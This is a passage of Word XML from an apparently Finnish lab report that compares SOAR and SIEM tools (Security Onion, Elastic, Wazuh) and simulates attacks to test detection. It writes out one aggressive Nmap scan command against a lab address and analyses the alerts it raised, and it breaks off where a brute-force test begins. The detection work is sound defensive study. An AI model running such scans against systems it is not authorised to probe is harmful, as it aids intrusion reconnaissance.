      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="1EB4405B" w:rsidP="49E009BF" w:rsidRDefault="48D9FE2E" w14:paraId="4C757AF6" w14:textId="01CA32BD">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc152041011" w:id="2096894062"/>
      <w:r w:rsidR="48D9FE2E">
        <w:rPr/>
        <w:t>Teoria</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2096894062"/>
    </w:p>
    <w:p w:rsidR="48D9FE2E" w:rsidP="49E009BF" w:rsidRDefault="48D9FE2E" w14:paraId="147CD938" w14:textId="38EFC843">
      <w:pPr>
        <w:pStyle w:val="Otsikko2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc283925451" w:id="908786869"/>
      <w:r w:rsidR="48D9FE2E">
        <w:rPr/>
        <w:t>Miten SOAR ja SIEM eroavat toisistaan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="908786869"/>
    </w:p>
    <w:p w:rsidRPr="00825CE0" w:rsidR="120D504D" w:rsidP="605EF1C1" w:rsidRDefault="120D504D" w14:paraId="29DC2E12" w14:textId="4947FB17">
      <w:r w:rsidRPr="00E739A0">
        <w:t>SOAR (Security Orchestration, Automation ja Response) ja SIEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00E739A0" w:rsidR="7AD31A21">
        <w:t xml:space="preserve"> (Security Information and Event management) ovat molemmat tärkeitä työkaluja kyberturvallisuudessa, mutta n</w:t>
      </w:r>
      <w:r w:rsidRPr="00E739A0" w:rsidR="517A17F4">
        <w:t xml:space="preserve">e kuitenkin eroavat </w:t>
      </w:r>
      <w:r w:rsidRPr="00E739A0" w:rsidR="5B714D1A">
        <w:t>toisistaan toiminnallisuudessa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E40381" w:rsidR="65F68137" w:rsidP="65F68137" w:rsidRDefault="456585DF" w14:paraId="055EFE77" w14:textId="53C14819">
      <w:r w:rsidRPr="00111271">
        <w:t xml:space="preserve">SIEM keskittyy pääasiassa turvallisuustapahtumien tietojen keräämiseen ja analysointiin </w:t>
      </w:r>
      <w:r w:rsidRPr="00111271" w:rsidR="7D3FFD1B">
        <w:t xml:space="preserve">eri lähteistä </w:t>
      </w:r>
      <w:r w:rsidRPr="00111271">
        <w:t xml:space="preserve">sekä se tarjoaa parannetun näkymän </w:t>
      </w:r>
      <w:r w:rsidRPr="00111271" w:rsidR="5E519AF8">
        <w:t xml:space="preserve">keskittyen lähinnä tietojen koostamiseen ja raportointiin. </w:t>
      </w:r>
      <w:r w:rsidRPr="00825CE0" w:rsidR="5E519AF8">
        <w:t xml:space="preserve">Kun taas SOAR laajentaa näitä SIEMin kyvykkyyksiä automaation, orkestroinnin avulla. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B0A47" w:rsidR="5E519AF8">
        <w:t>SOAR</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0A47" w:rsidR="3BDEF419">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0A47" w:rsidR="2F371A93">
        <w:t xml:space="preserve">ratkaisut </w:t>
      </w:r>
      <w:r w:rsidRPr="005B0A47" w:rsidR="0097CA65">
        <w:t>priorisoivat ja reagoivat tietoturvatapahtumiin tehokkaasti hyödyntämällä koneoppi</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0A47" w:rsidR="26AC0716">
        <w:t>miseen perustuvia automaatio- ja orkestrointiominaisuuksia.</w:t>
      </w:r>
      <w:r w:rsidR="6C93217B">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="443C714E" w:rsidR="00E5679F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Siddiqui, L</w:t>
      </w:r>
      <w:r w:rsidR="00462FB8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E5679F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7A5AD2B8">
        <w:t>2023.</w:t>
      </w:r>
      <w:r w:rsidR="6C93217B">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0792962D" w:rsidRDefault="519C969E" w14:paraId="3F574A3F" w14:textId="0CFA9171">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="67BDA2C3">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Yhteenvetona</w:t>
      </w:r>
      <w:r w:rsidRPr="0B08C632">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="67BDA2C3">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="40BEFD95">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="40BEFD95" w:rsidR="797D8C43">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>aikka</w:t>
      </w:r>
      <w:r w:rsidRPr="5DD1F313" w:rsidR="797D8C43">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> sekä SOAR että SIEM pyrkivät ratkaisemaan turvallisuuteen liittyvien tietojen ja tapahtumien käsittelyn haasteita, ne toimivat eri tasoilla. SIEM kerää tietoa, tunnistaa poikkeamia ja luo hälytyksiä, kun taas SOAR hyödyntää SIEMin tuottamaa dataa, yhdistelee sitä ja rikastaa sitä käyttäen automaatiota, tekoä</w:t>
      </w:r>
      <w:r w:rsidRPr="5DD1F313" w:rsidR="715216E6">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>lyä ja koneoppimista.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48D9FE2E" w:rsidP="586E88FD" w:rsidRDefault="48D9FE2E" w14:paraId="28EA5BB1" w14:textId="1F21AB8C">
      <w:pPr>
        <w:pStyle w:val="Otsikko2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1082550733" w:id="1165217896"/>
      <w:r w:rsidR="48D9FE2E">
        <w:rPr/>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:r w:rsidR="48D9FE2E">
        <w:rPr/>
        <w:t>Onion</w:t>
      </w:r>
      <w:r w:rsidR="48D9FE2E">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="48D9FE2E">
        <w:rPr/>
        <w:t>Elastic</w:t>
      </w:r>
      <w:r w:rsidR="48D9FE2E">
        <w:rPr/>
        <w:t xml:space="preserve"> ja </w:t>
      </w:r>
      <w:r w:rsidR="48D9FE2E">
        <w:rPr/>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1165217896"/>
    </w:p>
    <w:p w:rsidRPr="000D4C91" w:rsidR="00895D07" w:rsidP="672D5F12" w:rsidRDefault="2AE0C924" w14:paraId="35ED31C3" w14:textId="3E63D5E7">
      <w:r w:rsidRPr="000D4C91">
        <w:t>Security Onion</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C91" w:rsidR="49C04542">
        <w:t xml:space="preserve"> on ensisijaisesti SIEM-ratkaisu. Se on suunniteltu verkkoliikenteen monitorointiin, lokien keräämiseen ja hälytysten luomiseen.</w:t>
      </w:r>
      <w:r w:rsidR="00E73B4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF3B74">
        <w:t xml:space="preserve">Security Onion on avoimen lähdekoodin ohjelma, joten se on myös kustannustehokas. </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkEnd w:id="16"/>
    <w:p w:rsidRPr="000D4C91" w:rsidR="49C04542" w:rsidP="672D5F12" w:rsidRDefault="49C04542" w14:paraId="3417EEEC" w14:textId="1DEE9407">
      <w:r w:rsidRPr="000D4C91">
        <w:lastRenderedPageBreak/>
        <w:t>Elastic</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C91" w:rsidR="79B3ABD6">
        <w:t xml:space="preserve"> on monipuolinen alusta, jota voidaan käyttää SIEM-tyyppisiin tehtäviin. </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C91" w:rsidR="11DC3C15">
        <w:t>Se on suunniteltu erityisesti tietoturvatapahtumien seurantaan, analysointiin ja hälytyksien hallintaan.</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C91" w:rsidR="6551DF39">
        <w:t xml:space="preserve"> Siihen voidaan myös lisätä SOAR-ominaisuuksia kuten automaatiota. Elastic koostuu useista komponenteista:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6551DF39" w:rsidP="672D5F12" w:rsidRDefault="6551DF39" w14:paraId="3A04D574" w14:textId="0264DD4E">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Elasticsearch: Tiedon tallennus ja haku</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6551DF39" w:rsidP="672D5F12" w:rsidRDefault="6551DF39" w14:paraId="1BEBFEC9" w14:textId="629FC13B">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kibana: Visualisointi ja käyttöliittymä</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6551DF39" w:rsidP="672D5F12" w:rsidRDefault="6551DF39" w14:paraId="21790D10" w14:textId="3D263D8F">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logstash: Lokien keräys ja prosessointi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C0E6F" w:rsidP="001C0E6F" w:rsidRDefault="001C0E6F" w14:paraId="2601B49F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C0E6F" w:rsidP="001C0E6F" w:rsidRDefault="001C0E6F" w14:paraId="1E9C0863" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C0E6F" w:rsidP="001C0E6F" w:rsidRDefault="001C0E6F" w14:paraId="4031A771" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E61239" w:rsidR="00BC1473" w:rsidP="001F6724" w:rsidRDefault="3916EA7E" w14:paraId="46B7C431" w14:textId="69C4C467">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C91">
        <w:t xml:space="preserve">Wazuh kuuluu SOAR-ratkaisuihin, mutta se sisältää myös SIEM-ominaisuuksia. </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C91" w:rsidR="6FA8F276">
        <w:t xml:space="preserve">Wazuh yhdistää tietoturvalokien hallinnan, uhkien havaitsemisen ja automaation yhdeksi paketiksi. </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C91" w:rsidR="678F96C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Vaikka Wazuhilla on SIEM-ominaisuuksia, sen keskeinen arvo liittyy kykyyn toimia SOAR-työkaluna, koska se tukee automaatiota ja orkestrointia uhkien käsittelyssä. </w:t>
      </w:r>
      <w:r w:rsidRPr="672D5F12" w:rsidR="678F96C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Meidän ympäristössämme se on erityisesti luokiteltavissa SOAR-ratkaisuksi.</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc428542261" w:id="21"/>
      <w:bookmarkStart w:name="_Toc428799800" w:id="22"/>
      <w:bookmarkStart w:name="_Toc430675200" w:id="23"/>
      <w:bookmarkStart w:name="_Toc430768000" w:id="24"/>
      <w:bookmarkStart w:name="_Toc527546213" w:id="25"/>
      <w:bookmarkStart w:name="_Toc17205374" w:id="26"/>
      <w:r w:rsidR="00BC1473">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001638D7" w:rsidP="001638D7" w:rsidRDefault="00400A8B" w14:paraId="07B9D661" w14:textId="400CB4FC">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1988154086" w:id="2141212568"/>
      <w:r w:rsidR="00400A8B">
        <w:rPr/>
        <w:t>Testaukset ja havainnot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2141212568"/>
    </w:p>
    <w:p w:rsidRPr="001E0039" w:rsidR="001E0039" w:rsidP="001E0039" w:rsidRDefault="001E0039" w14:paraId="61029C12" w14:textId="3E7C5172">
      <w:r w:rsidRPr="001E0039">
        <w:t>Luodaan seuraavaksi hälytyksiä seurantajärjestelmiin s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">imuloimalla mahdollisia hyökkäyksissä ilmeneviä tapahtumia. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00400A8B" w:rsidR="00400A8B" w:rsidP="00400A8B" w:rsidRDefault="001E0039" w14:paraId="3ED1B2D9" w14:textId="683D8B9E">
      <w:pPr>
        <w:pStyle w:val="Otsikko2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc411660580" w:id="1546704246"/>
      <w:r w:rsidRPr="261F289F" w:rsidR="001E0039">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security Onion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1546704246"/>
    </w:p>
    <w:p w:rsidR="00DE2CB9" w:rsidP="002F6D54" w:rsidRDefault="002F6D54" w14:paraId="3582DC94" w14:textId="5EAE6F97">
      <w:r w:rsidRPr="002F6D54">
        <w:t>Al</w:t>
      </w:r>
      <w:r>
        <w:t>oitetaan Security Onion järjestelmän hälytysten tutkiminen</w:t>
      </w:r>
      <w:r w:rsidR="008348B9">
        <w:t xml:space="preserve"> tapausesimerkkien kautta ja a</w:t>
      </w:r>
      <w:r w:rsidR="00B32516">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="008348B9">
        <w:t xml:space="preserve">heutetaan </w:t>
      </w:r>
      <w:r w:rsidR="003734CB">
        <w:t xml:space="preserve">hälytyksiä </w:t>
      </w:r>
      <w:r w:rsidR="00A36E40">
        <w:t>simuloimalla erilaisia hyökkäystaktiikoita</w:t>
      </w:r>
      <w:r w:rsidR="00111271">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00111271" w:rsidP="008F0EE6" w:rsidRDefault="001B0316" w14:paraId="2D0255E8" w14:textId="52522095">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc260754327" w:id="1272935473"/>
      <w:r w:rsidR="001B0316">
        <w:rPr/>
        <w:t>Verkkojen skannaus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1272935473"/>
    </w:p>
    <w:p w:rsidR="001B0316" w:rsidP="001B0316" w:rsidRDefault="007A7AAC" w14:paraId="4AF1E25A" w14:textId="1A6604F8">
      <w:r>
        <w:t>Testataan aluksi, miten järjestelmä reagoi verkkojen ja porttien skannaamiseen Nmap ohjelmalla. ajetaan komento nmap -A -Pn 10.3.0.10 -sC</w:t>
      </w:r>
      <w:r w:rsidR="00786A4E">
        <w:t>. (Kuvio 2)</w:t>
      </w:r>
      <w:r w:rsidR="00CB7B89">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00786A4E" w:rsidP="00786A4E" w:rsidRDefault="00A96998" w14:paraId="7EE67D23" w14:textId="03BD1A7A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B4E26BE" wp14:editId="75CC5B06">
            <wp:extent cx="3831232" cy="2435961"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="384070713"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16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3831232" cy="2435961"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A7AAC" w:rsidP="00786A4E" w:rsidRDefault="00786A4E" w14:paraId="4C8AF252" w14:textId="23E8CE61">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971519" w:id="30"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidRPr="001B0316" w:rsidR="00AF5DC5" w:rsidP="001B0316" w:rsidRDefault="000116D7" w14:paraId="480F1300" w14:textId="52F05994">
      <w:r>
        <w:t>Skannaus aiheutti useita hälytyksi</w:t>
      </w:r>
      <w:r w:rsidR="00F71753">
        <w:t xml:space="preserve">ä esimerkiksi </w:t>
      </w:r>
      <w:r w:rsidR="006958D1">
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidR="00840F26">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006958D1">
        <w:t>yhteyden luonti yrityksistä</w:t>
      </w:r>
      <w:r w:rsidR="000904C8">
        <w:t xml:space="preserve"> ja muusta epäilyttävästä verkkoliikenteestä</w:t>
      </w:r>
      <w:r w:rsidR="00840F26">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008D562B">
        <w:t xml:space="preserve"> (Kuvio 3)</w:t>
      </w:r>
      <w:r w:rsidR="00840F26">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="531D8EAE" w:rsidRDefault="531D8EAE" w14:paraId="144D9DD7" w14:textId="3183D2CE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SecurityOnion havaitsi porttien skannaukset, kuten </w:t>
      </w:r>
      <w:r w:rsidR="2BD1ACFE">
        <w:t>MySQL tietokantaportin 3306, jo</w:t>
      </w:r>
      <w:r w:rsidR="416482F9">
        <w:t>ka</w:t>
      </w:r>
      <w:r w:rsidR="2BD1ACFE">
        <w:t xml:space="preserve"> on merkitty medium tasoll</w:t>
      </w:r>
      <w:r w:rsidR="565BEFD9">
        <w:t xml:space="preserve">e kriittisyydessään. </w:t>
      </w:r>
      <w:r w:rsidR="52547B8C">
        <w:t>Tason high kriittisyydellä on merkitty mm. LDAP Bind Request, joka voi viitata hyökkääjän y</w:t>
      </w:r>
      <w:r w:rsidR="37ABFC50">
        <w:t xml:space="preserve">rityksestä päästä käsiksi LDAP:n kautta Active Directoryn </w:t>
      </w:r>
      <w:r w:rsidR="6D60B0B9">
        <w:t>käyttäjien ja laitteiden tietoihin. Kriittisyys on korkea AD:n ollessa tärkeimpiä</w:t>
      </w:r>
      <w:r w:rsidR="248247CD">
        <w:t xml:space="preserve"> omaisuuksia Domainissa, ja hyökkääjän päästessä käsiksi siihen, voi päästä myös koko D</w:t>
      </w:r>
      <w:r w:rsidR="0375E717">
        <w:t>omainin hallintaan.</w:t>
      </w:r>
      <w:r w:rsidR="37ABFC50">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6DF9" w:rsidP="00DF6DF9" w:rsidRDefault="00786A4E" w14:paraId="1E6F04A5" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00786A4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="653953F2" wp14:editId="4E6BAA95">
            <wp:extent cx="6120130" cy="2113280"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1744633426" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus,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33426" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, teksti&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2113280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE2CB9" w:rsidP="00DF6DF9" w:rsidRDefault="00DF6DF9" w14:paraId="09760310" w14:textId="58A7290F">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971520" w:id="31"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00840F26">
        <w:t>Hälytykset nmapista</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="0059565A" w:rsidRDefault="0059565A" w14:paraId="42709022" w14:textId="4566C664">
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="000904C8">
        <w:t xml:space="preserve">uviossa </w:t>
      </w:r>
      <w:r w:rsidR="00DF6DF9">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="000904C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="000904C8">
        <w:t xml:space="preserve"> tarkasteltu hälytystä </w:t>
      </w:r>
      <w:r w:rsidR="000F7981">
        <w:t>epäilyttävästä uloslähtevästä MSSQL</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="000F7981">
        <w:t xml:space="preserve">yhteydestä takaisin skannausta tekevään </w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="000F7981">
        <w:t>-osoitteeseen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6DF9" w:rsidP="00DF6DF9" w:rsidRDefault="00DF6DF9" w14:paraId="1A539AFA" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00DF6DF9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47DF58E4" wp14:editId="76E1EE06">
            <wp:extent cx="6120130" cy="1550670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="977593891" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, teks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3891" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, teksti, viiva&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1550670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00825CE0" w:rsidP="0059565A" w:rsidRDefault="00DF6DF9" w14:paraId="4953E38E" w14:textId="3A5393D7">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971521" w:id="32"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. mssql</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidRPr="00825CE0" w:rsidR="00825CE0" w:rsidP="00825CE0" w:rsidRDefault="00825CE0" w14:paraId="666D18CD" w14:textId="5DDACDD7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Skannauksen voi siis havaita </w:t>
      </w:r>
      <w:r w:rsidR="00192CDC">
        <w:t>yleisesti ottaen suuresta määrästä verkkoliikennettä useisiin eri portteihin ja osoitteisiin</w:t>
      </w:r>
      <w:r w:rsidR="003007CC">
        <w:t xml:space="preserve"> jostain yleensä tuntemattomasta osoitteesta. Tässäkin huomaa miten on </w:t>
      </w:r>
      <w:r w:rsidR="00C5447D">
        <w:t>kokeiltu useita eri portteja ja palveluja.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE2CB9" w:rsidP="008F0EE6" w:rsidRDefault="00B10F9A" w14:paraId="792EECC8" w14:textId="5C2B189C">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1508244027" w:id="1981521096"/>
      <w:r w:rsidR="00B10F9A">
        <w:rPr/>
        <w:t xml:space="preserve">Brute </w:t>
      </w:r>
      <w:r w:rsidR="00AE696D">
        <w:rPr/>
        <w:t>force</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1981521096"/>
    </w:p>
    <w:p w:rsidR="00382A70" w:rsidP="00B10F9A" w:rsidRDefault="00713818" w14:paraId="6E3EE89A" w14:textId="51479C0D">
      <w:r w:rsidR="00713818">
        <w:rPr/>
        <w:t xml:space="preserve">Seuraavaksi testataan </w:t>
      </w:r>
      <w:r w:rsidR="00D75B7B">
